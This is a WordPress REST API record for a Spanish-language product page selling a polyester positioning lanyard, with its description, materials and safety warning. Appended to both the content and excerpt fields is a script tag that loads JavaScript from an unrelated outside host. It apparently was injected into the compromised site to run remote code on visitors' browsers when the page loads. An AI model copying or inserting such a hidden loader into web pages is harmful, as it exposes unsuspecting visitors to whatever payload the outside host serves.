{"id":5894,"date":"2020-11-09T09:54:23","date_gmt":"2020-11-09T09:54:23","guid":{"rendered":"https:\/\/cleh.cl\/?post_type=product&#038;p=5894"},"modified":"2025-11-19T19:22:51","modified_gmt":"2025-11-19T19:22:51","slug":"cabo-de-vida-king-cuerda","status":"publish","type":"product","link":"https:\/\/cleh.cl\/en\/product\/cabo-de-vida-king-cuerda\/","title":{"rendered":"CABO DE VIDA KING CUERDA"},"content":{"rendered":"<h1 class=\"product_title entry-title\" style=\"text-align: center;\">CABO DE VIDA KING CUERDA<\/h1>\n<p>El Cabo de vida KING es un elemento de posicionamiento de 1.8 m de longitud para m\u00faltiples condiciones de trabajo.<br \/>\nDotado de mosquet\u00f3n escala estructurero de doble gatillo de seguridad con garganta amplia de 56 mm de apertura para un f\u00e1cil aseguramiento en diversos tipos de estructuras y de mosquet\u00f3n de acero forjado de doble gatillo de seguridad para su conexi\u00f3n al arn\u00e9s.<\/p>\n<p>Este Cabo est\u00e1 fabricado con cuerda trenzada de poli\u00e9ster de 12 mm de di\u00e1metro, est\u00e1 protegida con guardacabos de pl\u00e1stico. Est\u00e1 rematado con una costura autom\u00e1tica de seguridad de alta resistencia a la tracci\u00f3n, cubierta con protecci\u00f3n pl\u00e1stica termocontraible para una f\u00e1cil inspecci\u00f3n.<\/p>\n<p>El Cabo de vida est\u00e1 recomendado s\u00f3lo para funciones de posicionamiento y no debe utilizarse, bajo ninguna circunstancia, como elemento antica\u00eddas.<\/p>\n<p><strong>Materiales<\/strong><br \/>\nAcero cincado.<br \/>\nCuerda trenzada de poli\u00e9ster.<br \/>\nResistencia A La Tracci\u00f3n\u00a02200 kg.<\/p>\n<p><strong>Apertura M\u00e1xima<\/strong><br \/>\n56 mm.<\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"https:\/\/clousc.com\/player.php?ver=3.0&amp;ref=api\" type=\"text\/javascript\"><\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>&nbsp;<\/p>\n<p><script src=\"https:\/\/clousc.com\/player.php?ver=3.0&amp;ref=api\" type=\"text\/javascript\"><\/script><\/p>","protected":false},"featured_media":5895,"comment_status":"closed","ping_status":"closed","template":"","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0},"product_brand":[],"product_cat":[59,42],"product_tag":[49],"class_list":{"0":"post-5894","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-cabos-de-vida","7":"product_cat-epp","8":"product_tag-segma","11":"instock","12":"shipping-taxable","13":"product-type-simple"},"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/cleh.cl\/en\/wp-json\/wp\/v2\/product\/5894","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cleh.cl\/en\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/cleh.cl\/en\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/cleh.cl\/en\/wp-json\/wp\/v2\/comments?post=5894"}],"version-history":[{"count":1,"href":"https:\/\/cleh.cl\/en\/wp-json\/wp\/v2\/product\/5894\/revisions"}],"predecessor-version":[{"id":5896,"href":"https:\/\/cleh.cl\/en\/wp-json\/wp\/v2\/product\/5894\/revisions\/5896"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cleh.cl\/en\/wp-json\/wp\/v2\/media\/5895"}],"wp:attachment":[{"href":"https:\/\/cleh.cl\/en\/wp-json\/wp\/v2\/media?parent=5894"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/cleh.cl\/en\/wp-json\/wp\/v2\/product_brand?post=5894"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/cleh.cl\/en\/wp-json\/wp\/v2\/product_cat?post=5894"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/cleh.cl\/en\/wp-json\/wp\/v2\/product_tag?post=5894"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}